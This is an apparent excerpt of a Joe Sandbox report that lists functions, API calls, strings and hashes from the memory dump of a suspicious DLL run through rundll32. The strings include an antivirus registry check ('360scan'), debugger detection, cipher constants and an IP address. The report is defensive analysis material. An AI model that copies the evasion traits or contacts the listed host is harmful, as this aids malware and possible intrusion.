CloseHandle.KERNEL32 ref: 000000018004B857
CloseHandle.KERNEL32 ref: 000000018004B88C

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CloseHandlememset$ProcessProcess32_wcsicmp$CreateFileFirstModuleNameNextOpenSessionSnapshotToolhelp32
String ID:
API String ID: 2365564757-0
Opcode ID: b577c6a2819bdb23608ddb003caa5f79ee9fd76a9e86d5510c2c30720fbc3c0c
Instruction ID: e435f450c34eaea3765f7d51f7fffc8566e0198940063861de715dcd391ad09e
Opcode Fuzzy Hash: b577c6a2819bdb23608ddb003caa5f79ee9fd76a9e86d5510c2c30720fbc3c0c
Instruction Fuzzy Hash: 19316631614A4881EBE59F25E89479973A4F788BE4F45C228F96A43694DF3CC70DCB04

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006A994 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 339COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018006A9D6

Part of subcall function 000000018006BD58: GetFileSizeEx.KERNEL32(?,?,?,?,000000018006A9EB,?,?,?,?,?,?,?,?,?,?,00000003), ref: 000000018006BD5C
Part of subcall function 000000018006BD58: _swprintf_c_l.LIBCMT ref: 000000018006BD74

Part of subcall function 000000018006A2B8: malloc.MSVCRT(?,?,?,0000000180069638), ref: 000000018006DF0A
Part of subcall function 000000018006A2B8: SetLastError.KERNEL32(?,?,?,0000000180069638), ref: 000000018006DF1B

_swprintf_c_l.LIBCMT ref: 000000018006AA1B
_swprintf_c_l.LIBCMT ref: 000000018006AA86
_swprintf_c_l.LIBCMT ref: 000000018006AB3B
_swprintf_c_l.LIBCMT ref: 000000018006AD15

Strings

INIT, xrefs: 000000018006AD63

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _swprintf_c_l$ErrorFileLastSizemallocmemset
String ID: INIT
API String ID: 2772675779-4041279936
Opcode ID: 91801e61f8e34b5680577b6ef1157ad949fcf405e34d1d65f93b8e184a0d9fad
Instruction ID: 738f7e56dffb12879fa424a41098a8b7db62e01a67729e30f645ff56db629163
Opcode Fuzzy Hash: 91801e61f8e34b5680577b6ef1157ad949fcf405e34d1d65f93b8e184a0d9fad
Instruction Fuzzy Hash: 31E192727043588BF7A6EB6598507EA77A6F70D7C8F54C029AE5A43B86DF34C608CB10

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005912C Relevance: 10.7, APIs: 7, Instructions: 202COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018005917B
memset.MSVCRT ref: 0000000180059194
memset.MSVCRT ref: 00000001800591C8
EnumDisplayDevicesW.USER32 ref: 00000001800593C6
memset.MSVCRT ref: 00000001800593E3
EnumDisplayDevicesW.USER32 ref: 0000000180059401

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: memset$DevicesDisplayEnum
String ID:
API String ID: 2856225746-0
Opcode ID: 5c5709e5d7299c401f45f5ffd4562792fd3562d72889c1e19fc8d239cebed65d
Instruction ID: 90789e0161200a82d414c2e2bf23b1b10d1e56c07e73b18e3e2605f8b4aac2a4
Opcode Fuzzy Hash: 5c5709e5d7299c401f45f5ffd4562792fd3562d72889c1e19fc8d239cebed65d
Instruction Fuzzy Hash: EA918C32A04A8892E7A2CF75C5053ED6761F7987C8F459202EF8D2769ADF75D78AC300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010B58 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 146registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010BE9
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010C46
memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010D0F
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180010D31
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010D3B

Strings

360scan, xrefs: 0000000180010BBB

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CloseOpenQueryValuememmove
String ID: 360scan
API String ID: 1121107697-2450673717
Opcode ID: 220e67dd3970d468599f7a797be11ec42a8334a823f280886d40bb2abff1120a
Instruction ID: 8412be06b917c2556790a81d519247f335b1f81f587c3bd72331bc97ccab05af
Opcode Fuzzy Hash: 220e67dd3970d468599f7a797be11ec42a8334a823f280886d40bb2abff1120a
Instruction Fuzzy Hash: B551F336700A4889FBA6CBB5E8107ED3760BB487E8F548215EEA917B95DF74C649C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018008023C Relevance: 10.6, APIs: 7, Instructions: 70COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT ref: 0000000180080256
_CxxThrowException.MSVCRT ref: 0000000180080276
_CxxThrowException.MSVCRT ref: 0000000180080296

Part of subcall function 000000018000EF8C: ??3@YAXPEAX@Z.MSVCRT ref: 000000018000F01A

_CxxThrowException.MSVCRT ref: 00000001800802BA
_CxxThrowException.MSVCRT ref: 00000001800802DA
_CxxThrowException.MSVCRT ref: 00000001800802FA
??3@YAXPEAX@Z.MSVCRT ref: 0000000180080312

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ExceptionThrow$??3@
String ID:
API String ID: 3542664073-0
Opcode ID: 4077b6000bdbe81cdcb22badff92ad6060c6f4ec82431c923b1cffb770fd83d1
Instruction ID: f77bb453ddad34bb426a0367fc3509630a9405fc871705a0e6efaa82900c553f
Opcode Fuzzy Hash: 4077b6000bdbe81cdcb22badff92ad6060c6f4ec82431c923b1cffb770fd83d1
Instruction Fuzzy Hash: 35216A72B00A88C9E75DFE33B8423EB6212ABD87C0F18D435BA594B69BDE25C5168740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800277FC Relevance: 10.1, Strings: 8, Instructions: 126COMMON

Download Yara Rule

Strings

Server, xrefs: 0000000180027992, 00000001800279AB
InprocServer, xrefs: 0000000180027850, 000000018002786F
LocalServer32, xrefs: 000000018002795F, 0000000180027978
gfffffff, xrefs: 000000018002781E
LocalServer, xrefs: 000000018002792C, 0000000180027945
InprocHandler, xrefs: 00000001800278C6, 00000001800278DF
InprocServer32, xrefs: 0000000180027893, 00000001800278AC
InprocHandler32, xrefs: 00000001800278F9, 0000000180027912

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ??3@
String ID: InprocHandler$InprocHandler32$InprocServer$InprocServer32$LocalServer$LocalServer32$Server$gfffffff
API String ID: 613200358-2853564933
Opcode ID: 60d0cc3e10b730d68bced1134fb6b4be0611d397146608c6a84ec919bfafbe9b
Instruction ID: 0e5f0972488cace8fe0dc732913b0fa19b9a33d93ef1df9988121a6d9c7f3852
Opcode Fuzzy Hash: 60d0cc3e10b730d68bced1134fb6b4be0611d397146608c6a84ec919bfafbe9b
Instruction Fuzzy Hash: 10413DB16003C985EBA29F56B951BC66B50B39DBC4F40A227AE9957F16CE7CC3088704

Uniqueness

Uniqueness Score: -1.00%

Function 000000018007B2D0 Relevance: 9.3, APIs: 6, Instructions: 338COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 000000018007B303
_errno.MSVCRT ref: 000000018007B34F

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: 7bb71522fe66fe911610681dfbd425f92e509f40c66d32b22c79924d92f1257a
Instruction ID: 88002c78fa737218ab7c06d54794bbebd81bd896c6f550827f0a310b477ef9b6
Opcode Fuzzy Hash: 7bb71522fe66fe911610681dfbd425f92e509f40c66d32b22c79924d92f1257a
Instruction Fuzzy Hash: 6BD1B472604B8C81EBE69F25D4413B967D0FB49BA8F148211EE68837D5DF7ECA99C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180066C3C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180066C52
GetLastError.KERNEL32 ref: 0000000180066C9D
IsDebuggerPresent.KERNEL32 ref: 0000000180066CB5
OutputDebugStringW.KERNEL32 ref: 0000000180066CC6

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0000000180066CBF

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: DebugDebuggerErrorLastOutputPresentStringmemset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 1848478996-631824599
Opcode ID: 9f3b69b346ce0167d1f9eabdb45a87455ea8902d3636c2fa194e63da2080b7c6
Instruction ID: 5420fd47393a03a9017ccb442b178d5ad27f9d1acba3036b184651f5d30fce96
Opcode Fuzzy Hash: 9f3b69b346ce0167d1f9eabdb45a87455ea8902d3636c2fa194e63da2080b7c6
Instruction Fuzzy Hash: FC117032710B4997F7869B22EE453E932A1FB58395F50C125E75982AA0EF3CD67CC710

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180082A18 Relevance: 7.6, APIs: 6, Instructions: 62COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT ref: 0000000180082A35
_CxxThrowException.MSVCRT ref: 0000000180082A55
_CxxThrowException.MSVCRT ref: 0000000180082A75
_CxxThrowException.MSVCRT ref: 0000000180082A95
_CxxThrowException.MSVCRT ref: 0000000180082AB8
_CxxThrowException.MSVCRT ref: 0000000180082ADB

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ExceptionThrow
String ID:
API String ID: 432778473-0
Opcode ID: 51705d7ffc1c5a9faf17d18654f459016f05baa871bea5d42b40ed88e15a0c9d
Instruction ID: 0cc55a271704fcaf4879220f63c9cc24c35a4ef39e1216f676686ee34d186413
Opcode Fuzzy Hash: 51705d7ffc1c5a9faf17d18654f459016f05baa871bea5d42b40ed88e15a0c9d
Instruction Fuzzy Hash: CE118471714A88C9E75EFE33A8027EB5312ABDC7C0F14D434B9894B65BCF25C6164300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180075480 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00000001800754AE

Strings

gfffffff, xrefs: 0000000180075766

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _errno
String ID: gfffffff
API String ID: 2918714741-1523873471
Opcode ID: 30e2b441770a82029b250d624d8f23b5d85c0f08b2924f70b9e89734be1034e0
Instruction ID: e884fe3883432bf4560e9dda0f15de4f5fdaecbd06aef68c98bbca16ed2f166a
Opcode Fuzzy Hash: 30e2b441770a82029b250d624d8f23b5d85c0f08b2924f70b9e89734be1034e0
Instruction Fuzzy Hash: 889135737097C986EBA68B25E0103ED7790A769BC5F448022EE88477C1EE6EC249C701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180062954 Relevance: 5.4, Strings: 4, Instructions: 411COMMON

Download Yara Rule

Strings

nd 3, xrefs: 0000000180062AA5
expa, xrefs: 0000000180062B81
te k, xrefs: 0000000180062C12
2-by, xrefs: 0000000180062BDC

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID:
String ID: 2-by$expa$nd 3$te k
API String ID: 0-3581043453
Opcode ID: 7d0663e54f1b2395dbcc08c568551d6f36a52211b7c4844561c2c131177ac7f0
Instruction ID: c297e74e0c180ef42d2354436ccfa45db5c13d40a8cb4edea60e41e24322b4e0
Opcode Fuzzy Hash: 7d0663e54f1b2395dbcc08c568551d6f36a52211b7c4844561c2c131177ac7f0
Instruction Fuzzy Hash: A0F1E5631292D48EC3A2DB7C984465E7FE0E39754AB28929AD7D5D3603D22CC21FCB31

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800630CC Relevance: 5.3, Strings: 4, Instructions: 318COMMON

Download Yara Rule

Strings

te k, xrefs: 00000001800632E3
2-by, xrefs: 000000018006321E
expa, xrefs: 00000001800630EB
nd 3, xrefs: 00000001800630F5

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID:
String ID: 2-by$expa$nd 3$te k
API String ID: 0-3581043453
Opcode ID: ec48b44b1c0248daf60d59e01e3f777e8872dcfd8e4671830303b2a941347eb0
Instruction ID: 6d189d3b1ce4af506612ec0345e062f7795090044f7a03dc3e29e2cc5fe06a45
Opcode Fuzzy Hash: ec48b44b1c0248daf60d59e01e3f777e8872dcfd8e4671830303b2a941347eb0
Instruction Fuzzy Hash: CEC1C6730182D44FE392CB3C9C9565EBFE0E346687B68A166E7D2C2511E128C66ACF71

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180062600 Relevance: 5.2, APIs: 4, Instructions: 248COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00000001800626EE
memset.MSVCRT ref: 0000000180062710
memmove.MSVCRT ref: 00000001800627F5
memmove.MSVCRT ref: 0000000180062865

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: memmovememset
String ID:
API String ID: 1288253900-0
Opcode ID: 25317eca67bb0a3083e8d95f7975eeecdd6a0a887f58df33bf998c20beef77dc
Instruction ID: 53b279b989bf8eb66429a88fea8492b1387e1814281b1786c9cbc4725fb6e079
Opcode Fuzzy Hash: 25317eca67bb0a3083e8d95f7975eeecdd6a0a887f58df33bf998c20beef77dc
Instruction Fuzzy Hash: 56A1A273A146D48FD795CF79D8407AC7BE1F389788F548126EA9997B48EB38C205CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800694A0 Relevance: 4.7, APIs: 3, Instructions: 245COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180069526
memset.MSVCRT ref: 0000000180069539
_swprintf_c_l.LIBCMT ref: 0000000180069652

Part of subcall function 000000018006BA80: _swprintf_c_l.LIBCMT ref: 000000018006BAC1

Part of subcall function 0000000180068F00: memcmp.MSVCRT ref: 0000000180068FE0
Part of subcall function 0000000180068F00: memcmp.MSVCRT ref: 0000000180068FF5

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _swprintf_c_lmemcmpmemset
String ID:
API String ID: 3402243518-0
Opcode ID: 0a455fc69ac5555ef9b59789ef52e4ee387e4f6a8b70c8b8c2abc5781c5c4145
Instruction ID: 04991b300d753ea99f0ca393c6383c4b0667eaf4037bc8f2b10675d73fc1c3cc
Opcode Fuzzy Hash: 0a455fc69ac5555ef9b59789ef52e4ee387e4f6a8b70c8b8c2abc5781c5c4145
Instruction Fuzzy Hash: 00B17132605B498AFBE29F65D8403DA73A6F7897C8F248015FF5947A89DF39C649CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006DFF4 Relevance: 4.1, APIs: 3, Instructions: 329COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018006E0A5
memset.MSVCRT ref: 000000018006E0FA
memset.MSVCRT ref: 000000018006E41C

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 68b498a9870c5649819b35abb25e3e0006ace2eeaae7a02313a6a2669247841e
Instruction ID: a9b31a437ae0bca1bb75622554864018f3139060eba26adcf1d538e86acb2b64
Opcode Fuzzy Hash: 68b498a9870c5649819b35abb25e3e0006ace2eeaae7a02313a6a2669247841e
Instruction Fuzzy Hash: 0DC15B767143D547EBB58E29E804BAAA792F39D7C8F209118FE5647B84DE39C609CF00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006E9FC Relevance: 4.1, APIs: 3, Instructions: 329COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018006EAAD
memset.MSVCRT ref: 000000018006EB02
memset.MSVCRT ref: 000000018006EE24

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: ec96dad2f3eed84204d703d5306213956bcf14a8c7e54300b208fbf0501b4f4c
Instruction ID: d79c931e67a80fc831bd15faf1131e8f54cdd3a742c49a95e34eb15ebc313304
Opcode Fuzzy Hash: ec96dad2f3eed84204d703d5306213956bcf14a8c7e54300b208fbf0501b4f4c
Instruction Fuzzy Hash: 72C15C767147D447EBB58E29E800BAA7792F39D7C8F20A118FA5643B94DE39D609CF00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180072A27 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 223COMMON

Download Yara Rule

Strings

0, xrefs: 0000000180072D23

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 8c794f425371a90e2de2cd336142ec1a125200395d7367a6d3b88ff2349b65e2
Instruction ID: 15fc530f1904ddfec9a7962715a48ba0c7a105f1d766ed486868df1d5ef4d4c2
Opcode Fuzzy Hash: 8c794f425371a90e2de2cd336142ec1a125200395d7367a6d3b88ff2349b65e2
Instruction Fuzzy Hash: 10A19C7221468886EBF6CF28D1443ED67E1F359BD8F549109EE8907789DF3ACA89C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000A7AC Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

Strings

171.8.167.45, xrefs: 000000018000A7AC

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: HeapProcess
